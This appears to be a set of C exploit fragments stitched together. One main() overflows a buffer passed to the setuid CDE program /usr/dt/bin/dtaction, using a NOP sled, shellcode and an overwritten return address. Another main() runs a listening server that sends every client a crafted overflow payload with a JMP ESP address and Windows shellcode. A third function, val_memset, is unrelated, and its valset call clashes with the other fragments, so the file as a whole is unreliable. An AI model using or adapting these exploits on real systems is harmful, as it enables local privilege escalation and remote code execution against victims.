main() { char buf[BUF_SIZE]; unsigned int esp=get_sp(),sw; memset(buf,NOP,BUF_SIZE); memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code, strlen(shell_code)); printf("esp=%x\n",esp); printf("0:Default value 1:Calculated value >"); fflush(stdout); scanf("%d",&sw); if (sw==0){ valset(buf+FAKE_OFFSET, FAKE_VALUE); valset(buf+EIP_OFFSET , EIP_VALUE); printf("Jumping address = %x\n",EIP_VALUE); }else{ valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF); valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF); printf("Jumping address = %x\n",esp+EIP_VALUE_DIF); } buf[BUF_SIZE-1]=0; execl("/usr/dt/bin/dtaction",buf,NULL); }
main() { FILE *fp; static char buf[MAXBUF]; static char pkt[MAXBUF*2]; char tmp[512]; int sock,sock_accept; int optval; struct sockaddr_in addr; memset(buf,NOP,MAXBUF); valset(buf+RETADR,JMPESP_ADR); valset(egg+OFS_LoadLibrary,ADDR_LoadLibrary); valset(egg+OFS_GetProcAddress,ADDR_GetProcAddress); strncpy(buf+CODEOFS,egg,strlen(egg)); buf[MAXBUF-1]=0; sprintf(pkt,RESP,buf); if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1){ perror("socket"); exit(1); } optval=1; setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(void *)&optval,sizeof(optval)); addr.sin_family = AF_INET; addr.sin_port = htons(SERVICE_PORT); addr.sin_addr.s_addr = INADDR_ANY; if ((bind(sock,(struct sockaddr *)&addr,sizeof(addr)))==-1){ perror("bind"); close(sock); exit(1); } if (listen(sock,1)==-1){ perror("listen"); close(sock); exit(1); } for (;;){ if ((sock_accept=accept(sock,NULL,NULL))==-1){ perror("accept"); close(sock); exit(1); } if (recv(sock_accept,tmp,sizeof(tmp),0)<=0){ close(sock_accept); continue; } send(sock_accept,pkt,strlen(pkt),0); close(sock_accept); } }
void *val_memset(void *data, const void *val, valType_t vt, size_t cnt) { void *ptr = data; if (data == NULL || val == NULL) return NULL; while (cnt--) valset(ptr++, val, vt); return data; }